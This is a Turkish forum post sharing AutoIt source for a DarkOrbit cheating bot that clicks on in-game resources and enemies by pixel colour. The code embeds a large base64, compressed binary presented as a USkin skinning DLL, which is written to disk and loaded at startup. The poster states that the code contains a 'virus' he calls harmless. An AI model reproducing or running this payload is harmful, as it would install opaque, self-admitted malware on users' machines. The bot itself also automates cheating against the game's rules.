	$bdata &= "TVhP28mOC0oVzcyQUAvVipSR0BfUDD2yLevMzg7TjydOzsqVC7ucMz//7cjFjI7JS4yNCw8MjIuTCQ4RCY2Ljg/I263b+0CNi5CMUAyPkJERjsvWDJCLP+dwM4s3BCERHZHSDxERSoT3NDeTjQfAlFsFjEqeTN7E2zNMC049kYnAghIJ5c0JPtWsH0tSUgvF0RnNCZKuGcsNSs9TMFuE70iEqgIJSABJCQoBuD2ezEjI0MMIzgbEDBATG18Du+BJCclShtdJhslVXjVpggbK1wmLhsbxibx211nHDU1Vy0bO94lPBs8IytBUzNbOkErxkJyG64KAskVVnEKFBDAFQVctek2h1B4IgYUBH4UEeHj2UieSE4IDA4MIW/HUnEBDCMGCXaKbapeSUcOC8jVyTF7HhINEIbguppCttkJztAKDvyifBdMdG7WBBYUAgsEBwQBQ1Dj2QsX8N4I3QyIG016CYwgUZEce7Zh8FQDR5DphirdhLRXMI"
	$bdata &= "tA3tpNXhwEGAQQVzlkCk4zwbQBLRDwK2irAfBIAgwDeVBscgEcGDBQ7Lt04AUQ6QgjIAdFpRgxBIrdDgbbVxoWo0WoIGmiS0MieTAF42CbKCzzyYCqIYrlCEd7o+IYPNHONMkRCI5AzxQTUHTfoTCPWEDBRGQzEA0jaNXdCKaKYKs4ldDwQKJgYQAqHgZTJVfSgDbSHHwI8EAwUfLcAQQoGAkINhVbyRRRUOInWCnUEAwQEOe0RyADJLgFBjz2BlNUE1QmAztc3rABFC0cODxI2B/3kgIoQGLw/AHteai0iWy8MBQgHDSEmkwMe3CAQK1bayzSBAE7gqhiJEgDDAAc2hRydAQYFDio5y6Mhb1mDQOPiYuWAj1Asa3YwmHr3w9ag3ZVJ0RAHHjTUUvsrVt5EBX72toFTPdCYA8gmVSw60J1MO3wAttb+1LDCAcLCA0H1GCgqgjRHKcHuyiOOSNBt2jZ1nGGuw8EeO4pCBhCEBF7l71tEAs"
	$bdata &= "JHUoTKUtLbW0ZJymi3tqKvXNbZxu1RBvBzfMd1labgrcURxGpbdsaB1U7FQ0EoW0Xa9kQYIl2q3l8ld2gIcWwF1tVJIJdnhVz0LYQCxsPfy3VVm0NDxHbtpeO8RMvIVPQUhttM439aUHBop9LxVbDtpPdFZPYsjeOtWX3K7Fj2+jtH08IaYOGVTAQvZFYtQEErzugWMVoeQcLXWq4tk8Q8SXwBrN32+AFCgwgBAIkDgEvBLv3KQMUA2/t2Vd7BzsoJAzmNBRAHI3d22YQDW8UGDZphV1bkIMjESCz2rZtg8M9D1EdBG+x7QwRcy9lpNjbUisD0wpGSzBjk63FJttase44IHNssG0tZRdf62yJwVK4nedoQxtRpSU0taJ4b0VhrzeTQeJYw5ebDe3e0FY/PA+GPSMRDYJdF/cLAdaLIAc/HADjnd2yJBUNHGSAE2w4Z4vRGBfoV5md4Bm4AB2jPx1UFBwrAL2AIbgQLrk0AJDkbEU7JgOE"
	$bdata &= "AJUH2xvLHRG/ANVLW8GCBSW3AKGbBAf3En1uAHfV2oJtCzW9ALX/7WAq3smPACTtJe/itrV9AG9KyydBYg9jADkPmQfbaGxbAEkJ4AHwbnvfABwECAwcFw8MACoIOzD3KkwQAFYwER4iBPC9AG3b3BQXa4EdAEW1XwDcP/CYADOGHBgUTEQkAJ44/y8k/hIwACBAPDxOJCgwADhEQCgoTCQUACzNCTi2LAYkAERAEAYo3v3tAOxEGCQeAH4oABQoPCwwKCg1AN0328wsCn4gABQGdDw0ODw4ACpVO4aZptIKAG4QB1gwaFiWACBA/hgQNazgACBoCLiYAJoDAH1NQwhMHCgCACAsmTw8iKOVAGYydAbDVQjNACgaIr5rzgxeAAYRnhiahhwwAD67BsgU0hiaACKvKPxHsO0KAOBYBAEQ8HgBABAcCBcGY4BGAHYEbjQYN/DYAAdMaJ5MpY4WAOi7E4arRpXQAJoQAc8r5ETtAAxuBAFqC"
	$bdata &= "FvfADAZFHoAIlP6AAwmTAEuf5gkAOiTF0kLAAIhAAsBCA7SZEAqAAZebL27FfQOABAqJgoXlvFtANkGOw8zCxbYAGyVr0kQDw12AG8KemCtB9c0AI0HdrSj1J4BAEDe/MwBqjIoADsgCkaZ5KsVAJyw/i5AL6yMAAcLXtQDLnT4AK5P/YPFnpEFAAAQ9UxNcE/pAC5yZLVGogH3ALD33re2DwG+AEAuTWB7KPOHAHbLwAcOT8AuAHJzcmPyaYKDANfmnuAACDaYAKhTcmWqBqruAIZWqVgw8AlPAEIrtwe2nliUAM7DFgsoTpIkAEnCCwAAAIBKBv9AAQkAgHwkCAEAD4XiAQAAYL4AAOAHEI2+ADAA+P9Xg83/6w0AkJCQigZGiAcARwHbdQeLHoOA7vwR23LtuMAKAgBIBBHAAdtzCyR1KAUIH0gKB+vUAYkDyetSMcmD6EADchHB4AgAF4MA8P90ddH4icWk6wsJGcxBSQO+ShARQB"
	$bdata &= "vvdQmEA3PkgwDBAoH9APv//wCD0QKNFC+D/UD8dg6KAkJALUkAdffpQv///4sAAoPCBIkHg8cABIPpBHfxAc8E6SxABV6J97nNACoAAIoHRyzoADwBd/eAPxN1APKLB4pfBGbBAOgIwcAQhsQpQPiA6+gB8MEOBRCI2OLZAEcACwAAiwcJwHRFi18ABI2EMHCOCwAAAfNQg8cI/5YgdI8LAJWAEwjAAHTcifl5Bw+3AAdHUEe5V0jyYK5V/5Z4QAfADQcAiQODwwTr2GEgMcDCDADAJI1eGPwxwEANwAYiPO8AdxEBw4sDhsQDgh9AHgPr4iQPwRDgEGaLwCAC6+IYi6584AjgEPD//wC7ABAAAFBUagAEU1f/1Y2HDwICwDkgf4BgKH8QWFBUUIECWGGNAEQkgGoAOcR1APqD7IDpHOz4HQBASGxAHwAIAN8HEOCgLgcQbIFAHwAfAP8fAB8AHwAfAB8AHwAfAB8Ayx8AAgAEogAHAME"
	$bdata &= "w4DkCgGA/AFgDAIAFFeAA+OAABuAAyAQAhIAM4AB4BwCAIEVAAFgKAIAY4ACYa+AA6wgQ4gjY5AiAAYDaA8AAKOAA4QNQ4ADhCtZ44ADhCqDgAAfhC+AAKgjgAPDgAAngABgCaACACuAAQOAAoY1oq+AA4Q+Q4AAN4AC44ACqDuAA4OAAD+AACOAUjeESMOAA6xEBAAQAC0LwYRJKCAA0gBPkFwMD7B/jBBjgAwxMCKwAtCAC+QRA4ATA4ASl/Qlo4AP0Tf8EkOADTChP/wQBplxQ/wTgKeADkFH/BAhAGsRSy38CfQIwcAL4U38CfQJyWHACLFV/An0CwSFgllZ/An0CqHAClFd/AmV9AtBwAshYfwJ9AvhZcAL8WX8CfQIgQCswllt/An0CSHACZFx/AjF3AgMA6TACQDCAEtZ58AxwABRwANB/KvIEApiwAphdCAAIphYB/wR4AsBwAqADCiwAuH8qegLocAJYBFgKAET/CXQCBDIC"
	$bdata &= "KJnwPQhS8DlwAAF48Dn1cAAOcACgcAB/BfAvwADgnAUKAOr/B/svwADgiAYKAKZ/AvsvwADgMAcKAOJ/AvsvwABgFAgKADR/AnQCDluQTHAZBXAMgEFwcAACVXAAmHAAA3AAwHAAERVwAOhwABJwABAGAFSAE3AAOHAAFHAAYFVwABlwAIhwABpwALDVcAAbcADYcAAcgUbwT6odcAAocAAvcABQcADXfwpwBEBOSHAKRH8KegJqiHACjHACVH8CegKwtXAC4HACLH8CegLYcAJgDAkKAIJ/AnoCALXAV5BwAtB/IXoCKHACYGALCgBkfwJ6AlDBcALEDAoAMn8CegKCeHAC+A0KAFD/CQV6AqBwAkgOCgBAq38CegLIcAKIcAJqfwLr+19wAvRwAtb/CftfwCPgzBAKABB/AvsvcALg3BEKACR/B/svwSgwEgoAMH8CdAIPAIIB8EAACACAFnAAmihwABdwACBegBhwAKp4cAAZcACgc"
	$bdata &= "AAacACqyHAAG3AA8HAAHHAArBgJ8ChwAEBwAB5wAKpocAAfcACQcAAgcACquHAAIXAA4HAAInAA6SAkgCNwADB+e/QPsV5d8Aoi/wr7DzAAVHACFL9/AvsPMQB/Av8/MAB8fwLf/z+xAn8C/28wAKR/Av9v3cCGuH8C/29wAsx/Av9v3XAC4H8C/29wAvR/Av9vuXACCBN/Av5vcAIcfwIL/29wAjB0Ajy3GOQEAAoAA+ABAAQACAAAIAoAAESwEwoAFABEGZxIAE4KWBxOAQAKcAoAgAURfogAP9yaCwA4qgMXPwIABbAQPwkACILIAD8YngsAVgh/ImwAjzgDNAAJVgCIUwBfAAVFAFIACaBJAE8ATgAPSQAFhkYACwEAvQTv/oElWAAAA4IChQM/gAEgV4Q1gT8JAJYACAGAJ3QAAHIAaQBuAGdBgCZpAGwAZYAsblAAZgBvgBFyghEwVAA4gAE0ggFigAIAUAAyAAmAC0OAEW1QAH"
	$bdata &= "AAYYAXeYBGYRWABmWCLU6AVUUATRWABmSAKWGCCUoAEYuAGYUxRIABcwBjgj2qcIBBaYAlboITd4IAui6ABmWAAIEogyEugBajgTcBADYAC4glVsAARnJAE8cQMwAswD0wxUgBMcIFLAAGwA3BN6p0wgxuwBVsSC5VwEOCa0JDAABqACPACtpMwAVnQglBO3DAOUEsqGcAaEAQAMYEUsYEqCAAKEAFKcABMkAeojBAKiAALUYDOEAC0dFGPAAKwBpPxBbBH69BHMU3QQPNJy5AUExAAFVBhxvADlDADm9AFHWtQEl0ymLHDCDADHlEE1ppwAkgwA/BBWtEAmLVwBBhwAB5wg06wljLFaNNWtVZOgANwpZwwAtiY0I5bABCwBDBM2RVwAdCwAV0QAUg0G5EjULFVkIiT6QAACRCs2pUwipuQA5s4ADpRwQACLAEpBYKADwAYXNzZW1ibHkAIHhtbG5zPSIAdXJuOnNjaGUAbWFzLW1pY3I"
	$bdata &= "Ab3NvZnQtY28AbTphc20udjEAIiBtYW5pZmUAc3RWZXJzaW8Abj0iMS4wIj4QDQo8L2UJPlBBwWlo5J8LAHRgAAkAqvHgAYxsAv7gAZRsAqALoAsAnGwCGGACqqRsAiJgAqxsAi9gAqq0bAI5YAK8bAJGYAKqxGwCUmACzGwCXWACatRsAmpgAtxsAgUAdFVgA4JgAJJgAKJgALCrYAABAL7kAMzkAN7kAEru5AD25AASoeMACaoA46Ek5AEw5AA45AACcOQDS0VSTkVMADMyLkRMTABBIERWQVBJgAFkbOGgck9NQ1QhA4EBYDlIZGxnhAFHRGUEaYBtYWdlaGxwggEIb2xlxAJPTEVBhFVUhAFTSExXoAohYgFVU0VSxAJXSQBOU1BPT0wuRIBSVgBXUzJf5AIAAExvYWRMaWIQcmFyeSBCR2V0AFByb2NBZGRyCGVzc2ByaXJ0dcRhbGACdGVjAIXkASBBbGxvY6YBRnICZSF0UmVn"
	$bdata &= "Q2xvEHNlS2Xhbl9UcgBhY2tNb3VzZTBFdmVuYAdgC0ZpgGxlVGl0bGWBTwBTYXZlREMAACJJoRpEaXIADG9yAHlFbnRyeVRvCERhdCGKQ29DcgBlYXRlSW5zdAhhbmPADFBhdGhgSXNVTkOjFQEIAABPcGVuUHJpbgh0ZXKkWleTF0lp4QAKo2F/AOCYYwBwQeAxFKILALhgAFAANwAA0CcAAOACOOACKwAAwCgApACggAQQLOACLWMAKcCTAHBgAOBgAFAvt2AEYADhAjCAx2kAYGQArWkCkAHMwIhwYADgYADMUDLgB2AAMDPgDGAAKhBA4oBgAPBgAGA1A+AKMADAAwMAcCqwAABANjB2MAAU8AuqIzAAODAAUjAAYzAAqnYwAIwwAKYwALQwAKrKMADUMADhMADvMACC/TAADKQLAB8wAKoxMAA+MABKMABcMACqaTAAeDAAiTAAnzAAKrAwAMYwAOMwAAClqAsAIDAAKjAAODAAq"
	$bdata &= "lAwAGowAHwwAIwwAKqdMACzMADLMADeMAAi+zAAG6YLEHoGAAAHABwADgAhAIgYABlSXA8AF1ByAhJwiBUAFgAQAAAlAAgAEwAdAIgeAB+wUiQAItBlVZF8CfBiDXBQBTBaDEQAGpBqJwAmcCtrDGluFCyQAEFib3UGdIEA5ABwcGx5Q6BvbG9yVDBQZU8BQUABQnlSR0KYAVT6aGAkZAMBQiqBADImIgEARHJhd0ZyYW3oZUNv4CdvdAdRAXEAHQIqU+ApoFSXAVRleAJ00wBFbmFibGVgV2luZG/yAlQBeOZp9AFgKkJvRQXAAGIKQdYARFdPUkTXAG8GdbAE5gBFbnVtUwp0oC1nKgFWYWx1LUcCRkALxgBJuABMYSBzdEVycsgGTWWMbnXGAIwFU3lzmwnBBQFCcnVzaFYBcA6PawIFAW4C5BBPYmqwEz5S8UPPAcMBtxTPAXRWyGlzaTYRSW5VFYFLA9cW1QBGcm9tQnUYZmZl9A"
	$bdata &= "l5AVJlc3hvdXJARJIBQUNbIFKwZW1vdpIh9QBzEEmFCAFTAxRJdGVtMiHzXwFRAUV4dgE9ISoBrQ9jzwGrD1VwZJBQoQZCXGFyQmUxMzBvPkAAgPGzAIAwhFFHDwAPAA8A/w8ADwAPAA8ADwAPAA8ADwD/DwAPAA8ADwAPAA8ADwAPAD8PAA8ADwAPAA8AAgA="
	If $ltosave Then
		$hfilehwnd = FileOpen($sfilename, 10)
		If @error Then Return SetError(1, 0, 0)
		FileWrite($hfilehwnd, __uskindll(__uskindllb64($bdata)))
		FileClose($hfilehwnd)
		If $lexecute Then
			RunWait($sfilename, "")
			FileDelete($sfilename)
			Return 1
		EndIf
		If FileExists($sfilename) Then Return $sfilename
	Else
		Return __uskindll(__uskindllb64($bdata))
	EndIf
	Return SetError(1, 0, 0)
EndFunc

Func __uskindllb64($sinput)
	Local $struct = DllStructCreate("int")
	Local $a_call = DllCall("Crypt32.dll", "int", "CryptStringToBinary", "str", $sinput, "int", 0, "int", 1, "ptr", 0, "ptr", DllStructGetPtr($struct, 1), "ptr", 0, "ptr", 0)
	If @error OR NOT $a_call[0] Then
		Return SetError(1, 0, "")
	EndIf
	Local $a = DllStructCreate("byte[" & DllStructGetData($struct, 1) & "]")
	$a_call = DllCall("Crypt32.dll", "int", "CryptStringToBinary", "str", $sinput, "int", 0, "int", 1, "ptr", DllStructGetPtr($a), "ptr", DllStructGetPtr($struct, 1), "ptr", 0, "ptr", 0)
	If @error OR NOT $a_call[0] Then
		Return SetError(2, 0, "")
	EndIf
	Return DllStructGetData($a, 1)
EndFunc

Func __uskindll($bbinary)
	$bbinary = Binary($bbinary)
	Local $tinput = DllStructCreate("byte[" & BinaryLen($bbinary) & "]")
	DllStructSetData($tinput, 1, $bbinary)
	Local $tbuffer = DllStructCreate("byte[" & 16 * DllStructGetSize($tinput) & "]")
	Local $a_call = DllCall("ntdll.dll", "int", "RtlDecompressBuffer", "ushort", 2, "ptr", DllStructGetPtr($tbuffer), "dword", DllStructGetSize($tbuffer), "ptr", DllStructGetPtr($tinput), "dword", DllStructGetSize($tinput), "dword*", 0)
	If @error OR $a_call[0] Then
		Return SetError(1, 0, "")
	EndIf
	Local $toutput = DllStructCreate("byte[" & $a_call[6] & "]", DllStructGetPtr($tbuffer))
	Return SetError(0, 0, DllStructGetData($toutput, 1))
EndFunc

Global $huskindllhandle = -1

Func _uskin_loaddll()
	Local $sdllname
	$sdllname = _uskindll(True)
	If @error Then Return SetError(0, 0, 0)
	$huskindllhandle = DllOpen($sdllname)
	If $huskindllhandle = -1 Then Return SetError(0, 0, 0)
	DllCall("kernel32.dll", "handle", "LoadLibraryW", "wstr", $sdllname)
	If @error Then Return SetError(0, 0, 0)
	Return 1
EndFunc

Func _uskin_exit()
	If $huskindllhandle = -1 Then Return 0
	DllCall($huskindllhandle, "int", "USkinExit")
	If @error Then Return SetError(0, 0, 0)
	Return 1
EndFunc

Func _uskin_init($sskinname, $susername = "", $sregcode = "")
	Local $vusername = "ptr", $vregcode = "ptr"
	If $huskindllhandle = -1 AND NOT _uskin_loaddll() Then Return SetError(0, 0, 0)
	If StringLen($susername) Then $vusername = "str"
	If StringLen($sregcode) Then $vregcode = "str"
	DllCall($huskindllhandle, "int", "USkinInit", $vusername, $susername, $vregcode, $sregcode, "str", $sskinname)
	If @error Then Return SetError(0, 0, 0)
	Return 1
EndFunc

Func _uskin_loadskin($sskinname)
	If $huskindllhandle = -1 Then Return 0
	DllCall($huskindllhandle, "int", "USkinLoadSkin", "str", $sskinname)
	If @error Then Return SetError(0, 0, 0)
	Return 1
EndFunc

Func _uskin_removeskin()
	If $huskindllhandle = -1 Then Return SetError(1, 0, 0)
	DllCall($huskindllhandle, "int", "USkinRemoveSkin")
	If @error Then Return SetError(0, 0, 0)
	Return 0
EndFunc

Func _uskin_restoreskin()
	If $huskindllhandle = -1 Then Return SetError(0, 0, 0)
	DllCall($huskindllhandle, "int", "USkinRestoreSkin")
	If @error Then Return SetError(0, 0, 0)
	Return 1
EndFunc

Func _uskin_aboutskin()
	If $huskindllhandle = -1 Then Return SetError(0, 0, 0)
	Local $result = DllCall($huskindllhandle, "int", "USkinAboutSkin")
	If @error Then Return SetError(0, 0, 0)
	Return 0
EndFunc

_uskin_loaddll()
_uskin_init(@ScriptDir & "\Skins\G2.msstyles")
Local $guiwidth = 250, $guiheight = 250
$width = 100
$heigth = 20
Local $hgui_rect2 = GUICreate("", $width, $heigth, $mpos[0] - $width / 2, $mpos[1] - $heigth / 2, $ws_popup, $ws_ex_toolwindow + $ws_ex_topmost + $ws_ex_layered)
GUISetBkColor(0)
_winapi_setlayeredwindowattributes($hgui_rect2, 0, 208, 0)
GUICtrlCreateGraphic(0, 0, $width, $heigth)
GUICtrlSetGraphic(-1, $gui_gr_color, 16733695)
GUICtrlSetGraphic(-1, $gui_gr_pensize, 8)
GUICtrlSetGraphic(-1, $gui_gr_rect, 0, 0, $width, $heigth)
GUISetState(@SW_SHOW)
$width = 190
$heigth = 98
Local $hgui_rect = GUICreate("", $width, $heigth, $mpos[0] - $width / 2, $mpos[1] - $heigth / 2, $ws_popup, $ws_ex_toolwindow + $ws_ex_topmost + $ws_ex_layered)
GUISetBkColor(0)
_winapi_setlayeredwindowattributes($hgui_rect, 0, 208, 0)
GUICtrlCreateGraphic(0, 0, $width, $heigth)
GUICtrlSetGraphic(-1, $gui_gr_color, 16318464)
GUICtrlSetGraphic(-1, $gui_gr_pensize, 8)
GUICtrlSetGraphic(-1, $gui_gr_rect, 0, 0, $width, $heigth)
GUISetState(@SW_SHOW)

Func pala()
	$mpos = MouseGetPos()
	If $izin2 = 0 Then
		WinMove($hgui_rect2, "", $mpos[0] - 100 / 2, $mpos[1] - 20 / 2)
	EndIf
EndFunc

Local $variable[2]
$x = 0
$izin = 0
$izin2 = 0
$y = 0

Func get_exit()
	GUIDelete($hgui_rect)
	Exit 
EndFunc

Func stop()
	$mpos = MouseGetPos()
	If $izin = 0 Then
		WinMove($hgui_rect, "", $mpos[0] - $width / 2, $mpos[1] - $heigth / 2)
	EndIf
EndFunc

#EndRegion
#Region
$serial = DriveGetSerial("C:\")
$form1 = GUICreate("Bele_bot", 400, 250)
$input_serialnumber = GUICtrlCreateInput("" & $serial, 180, 230, 80, 20)
If GUICtrlRead($input_serialnumber) = "538950653" Then
Else
	MsgBox(1, "iyi kullan1mlar")
EndIf
#EndRegion
$checkbox = GUICtrlCreateCheckbox("Palladium TOPLA", 25, 50, 115, 20)
$checkbox7 = GUICtrlCreateCheckbox("YARATIK KES(Streuner,Lordakia)", 160, 70, 195, 20)
$checkbox2 = GUICtrlCreateCheckbox("Korsanlar1 Kes", 25, 70, 155, 20)
$checkbox3 = GUICtrlCreateCheckbox("Bonus Kutu Topla", 25, 90, 155, 20)
$checkbox4 = GUICtrlCreateCheckbox("Korsan Kutusu(booty) Topla", 25, 110, 155, 20)
$checkbox5 = GUICtrlCreateCheckbox("Kargo Kutusu Topla", 25, 130, 155, 20)
$exitb = GUICtrlCreateButton("Botu Kapat", 300, 140, 100, 60)
$toplama = GUICtrlCreateCombo("H1zl1 Topla", 200, 10)
GUICtrlSetData(-1, "Normal Topla|Güvenli Topla", "Güvenli Topla")
GUICtrlCreateLabel("Toplanan Palladium:", 25, 150, 100, 20)
GUICtrlCreateLabel("Toplanan Bonus Kutu:", 25, 190, 125, 20)
GUICtrlCreateLabel("Toplanan Korsan Kutusu:", 25, 210, 125, 20)
GUICtrlCreateLabel("Kesilen Yarat1k:", 25, 170, 100, 20)
GUICtrlCreateLabel("Kapatma Tu_u = 'END' ", 300, 200, 100, 50)
$pall = 0
$npc = 0
$kutu = 0
$booty = 0
$toplaaa = 0
GUISetState()
Local $coordinates[2]
Local $coordinates2[2]
While (1)
	$nmsg = GUIGetMsg()
	Switch $nmsg
		Case $gui_event_close
			Exit 
	EndSwitch
	$palld = GUICtrlCreateLabel($pall, 125, 150, 100, 20)
	GUICtrlCreateLabel($npc, 125, 170, 100, 20)
	GUICtrlCreateLabel($kutu, 150, 190, 100, 20)
	GUICtrlCreateLabel($booty, 150, 210, 100, 20)
	Dim $pets[9]
	$pets[0] = 2
	$pets[1] = "petlogin.bmp"
	$pets[2] = "pasif.bmp"
	$pets[3] = "ham.bmp"
	#Region toplama h1z1
	If GUICtrlRead($toplama) = "H1zl1 Topla" Then
		$toplaaa = 1400
	ElseIf GUICtrlRead($toplama) = "Normal Topla" Then
		$toplaaa = 1550
	ElseIf GUICtrlRead($toplama) = "Güvenli Topla" Then
		$toplaaa = 1700
	EndIf
	#EndRegion
	#Region ç1k1_
	If GUICtrlRead($exitb) = 1 Then
		get_exit()
	EndIf
	#EndRegion
	#Region yarat1kkesme
	If GUICtrlRead($checkbox7) = 1 Then
		#Region streuner
		$coordinates2 = PixelSearch(0, 0, 1024, 700, 5772578, "", "")
		If IsArray($coordinates2) = True Then
			MouseClick("left", $coordinates2[0], $coordinates2[1], 2, 0)
			Send("{LCTRL}")
			$npc = $npc + 1
			Sleep(1111)
		ElseIf IsArray($coordinates2) = True Then
			MouseClick("left", $coordinates2[0], $coordinates2[1], 2, 0)
			Send("{LCTRL}")
			$npc = $npc + 1
			Sleep(1111)
		ElseIf IsArray($coordinates2) = True Then
			MouseClick("left", $coordinates2[0], $coordinates2[1], 2, 0)
			Send("{LCTRL}")
			$npc = $npc + 1
			Sleep(1111)
		Else
			MouseClick("left", $mpos[0] - $width / Random(3, 99) * Random(2, 5), $mpos[1] - $heigth / Random(2, 98) * Random(2, 5), 1, 0)
		EndIf
		#EndRegion
		#Region Lordakia
		$coordinates2 = PixelSearch(0, 0, 1024, 700, 1844281, "", "")
		If IsArray($coordinates2) = True Then
			MouseClick("left", $coordinates2[0], $coordinates2[1], 2, 0)
			Send("{LCTRL}")
			$npc = $npc + 1
			Sleep(1500)
		ElseIf IsArray($coordinates2) = True Then
			MouseClick("left", $coordinates2[0], $coordinates2[1], 2, 0)
			Send("{LCTRL}")
			$npc = $npc + 1
			Sleep(1500)
		ElseIf IsArray($coordinates2) = True Then
			MouseClick("left", $coordinates2[0], $coordinates2[1], 2, 0)
			Send("{LCTRL}")
			$npc = $npc + 1
			Sleep(1500)
		Else
			MouseClick("left", $mpos[0] - $width / Random(3, 99) * Random(2, 5), $mpos[1] - $heigth / Random(2, 98) * Random(2, 5), 1, 0)
		EndIf
		#EndRegion
	EndIf
	#EndRegion
	#Region kargokutusu
	If GUICtrlRead($checkbox5) = 1 Then
		$coordinates = PixelSearch(0, 0, 1024, 700, 16777130, "", "")
		If IsArray($coordinates) = True Then
			MouseClick("left", $coordinates[0], $coordinates[1], 1, 0)
			Sleep(2000)
		Else
			MouseClick("left", $mpos[0] - $width / Random(3, 99) * Random(2, 5), $mpos[1] - $heigth / Random(2, 98) * Random(2, 5), 1, 0)
		EndIf
	EndIf
	#EndRegion
	#Region Korsan kutusu
	If GUICtrlRead($checkbox4) = 1 Then
		$coordinates = PixelSearch(0, 0, 1024, 700, 7667711, "", "")
		If IsArray($coordinates) = True Then
			MouseClick("left", $coordinates[0], $coordinates[1], 1, 0)
			$booty = $booty + 1
			Sleep(2000)
		Else
			MouseClick("left", $mpos[0] - $width / Random(3, 99) * Random(2, 5), $mpos[1] - $heigth / Random(2, 98) * Random(2, 5), 1, 0)
		EndIf
	EndIf
	#EndRegion
	#Region kututoplama
	If GUICtrlRead($checkbox3) = 1 Then
		$coordinates2 = PixelSearch(0, 0, 1024, 700, 16767372, "", "")
		If IsArray($coordinates2) = True Then
			MouseClick("left", $coordinates2[0], $coordinates2[1], 1, 0)
			$kutu = $kutu + 1
			Sleep(1500)
		ElseIf IsArray($coordinates2) = True Then
			MouseClick("left", $coordinates2[0], $coordinates2[1], 1, 0)
			$kutu = $kutu + 1
			Sleep(1500)
		Else
			MouseClick("left", $mpos[0] - $width / Random(1, 75), $mpos[1] - $heigth / Random(1, 55), 1, 0)
		EndIf
	EndIf
	#EndRegion
	#Region pet
	If GUICtrlRead($checkbox2) = 1 Then
		$variable = PixelSearch(0, 0, 1024, 700, 4933706, "", "")
		If IsArray($variable) = True Then
			MouseClick("left", $variable[0], $variable[1], 2, 0)
			Sleep(1888)
		ElseIf IsArray($variable) = True Then
			MouseClick("left", $variable[0], $variable[1], 2, 0)
			Sleep(1888)
		ElseIf IsArray($variable) = True Then
			MouseClick("left", $variable[0], $variable[1], 2, 0)
			Sleep(1888)
		Else
		EndIf
		$variable = PixelSearch(0, 0, 1024, 700, 4804163, "", "")
		If IsArray($variable) = True Then
			MouseClick("left", $variable[0], $variable[1], 2, 0)
			Sleep(1888)
		ElseIf IsArray($variable) = True Then
			MouseClick("left", $variable[0], $variable[1], 2, 0)
			Sleep(1888)
		ElseIf IsArray($variable) = True Then
			MouseClick("left", $variable[0], $variable[1], 2, 0)
			Sleep(1888)
		Else
		EndIf
		$variable = PixelSearch(0, 0, 1024, 700, 6446423, "", "")
		If IsArray($variable) = True Then
			MouseClick("left", $variable[0], $variable[1], 2, 0)
			Sleep(1888)
		ElseIf IsArray($variable) = True Then
			MouseClick("left", $variable[0], $variable[1], 2, 0)
			Sleep(1888)
		ElseIf IsArray($variable) = True Then
			MouseClick("left", $variable[0], $variable[1], 2, 0)
			Sleep(1888)
		Else
		EndIf
	EndIf
	#EndRegion
	#Region palladium
	If GUICtrlRead($checkbox) = 1 Then
		$coordinates = PixelSearch(0, 0, 1024, 700, 9412019, "", "")
		If IsArray($coordinates) = True Then
			MouseClick("left", $coordinates[0], $coordinates[1], 1, 0)
			$pall = $pall + 1
			Sleep($toplaaa)
		ElseIf IsArray($coordinates) = True Then
			MouseClick("left", $coordinates[0], $coordinates[1], 1, 0)
			$pall = $pall + 1
			Sleep($toplaaa)
		ElseIf IsArray($coordinates) = True Then
			MouseClick("left", $coordinates[0], $coordinates[1], 1, 0)
			$pall = $pall + 1
			Sleep($toplaaa)
		Else
			MouseClick("left", $mpos[0] - $width / Random(3, 99), $mpos[1] - $heigth / Random(2, 98), 1, 0)
		EndIf
	Else
	EndIf
	#EndRegion
WEnd


KODLARDA BİR TANE VİRÜS VARDIR ZARARSIZDIR İSTEYEN KULLANIRramorecai isimli Üye şimdilik offline konumundadır   Alıntı ile Cevapla
Cevapla

Seçenekler Arama
Stil

Yetkileriniz

Benzer Konular
Konu Konuyu Başlatan Forum Cevaplar Son Mesaj
kendi pala botunuzu kendiniz yapın sefasaiddeniz Darkorbit Botlar ve Buglar 45 22 Mayıs 2013 21:15
Yaratık kesen ekran botu ! dreamhawk Darkorbit Botlar ve Buglar 15 03 Mayıs 2013 08:02
Ekran Bot Pala+Npc Kesen vdfn Darkorbit Botlar ve Buglar 2 26 Nisan 2013 16:35
Yaratık Kesen Ekran Botu pionix Darkorbit Botlar ve Buglar 13 23 Mart 2013 14:48
Kutu & yaratık kesen ekran botu ! beko9812 Darkorbit Botlar ve Buglar 79 21 Mart 2013 09:03

Tüm Zamanlar GMT +3 Olarak Ayarlanmış. Şuanki Zaman: 16:36.

Sistem Bilgileri Bilinmesi Gerekenler
Powered by vBulletin® Version 3.8.4
Copyright ©2000 - 2018, Jelsoft Enterprises Ltd.
Search Engine Optimization by vBSEO 3.6.1
User Alert System provided by Advanced User Tagging v3.1.0 (Lite) - vBulletin Mods & Addons Copyright © 2018 DragonByte Technologies Ltd. Runs best on HiVelocity Hosting.
Lütfen Sorunlarınızı Buradan Bize Bildiriniz.

Sitedeki Tüm Paylaşımların Sorumlulukları Paylaşım Sahiplerine Aittir. ŞİKAYETÇİ OLDUGUNUZ ICERIK VARSA Sikayet@forumzero.net adresine mail atınız. 48-72 saat içerisinde islem yapılacaktır.

Tema Tasarımı ForumZero.Net - Foxin - satin almak iletişime gecenilirsiniz.


1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 140 141 142 143 144 145 146 147 148 149 150 151 152 153 154 155 156 157 158 159 160 161 162 163 164 165 166 167 168 169 170 171 172 173 174 175 176 177 178 179 180 181 182 183 184 185 186 187 188 189 190 191 192 193 194 195 196 197 198 199 200 201 202 203 204 205 206 207 208 209 210 211 212 213 214 215 216 217 218 219 220 221 222 223 224 225 226 227 228 229 230 231 232 233 234 235 236 237 238 239 240 241 242 243 244 245 246 247 248 249 250 251 252 253 254 255 256 257 258 259 260 261 262 263 264 265 266 267 268 269 270 271 272 273 274 275 276 277 278 279 280 281 282 283 284 285 286 287 288 289 290 291 292 293 294 295 296 297 298 299 300 301 302 303 304 305 306 307 308 309 310 311 312 313 314 315 316 317 318 319 320 321 322 323 324 325 326 327 328 329 330 331 332 333 334 335 336 337 338 339 340 341 342 343 344 345 346 347 348 349 350 351 352 353 354 355 356 357 358 359 360 361 362 363 364 365 366 367 368 369 370 371 372 373 374 375 376 377 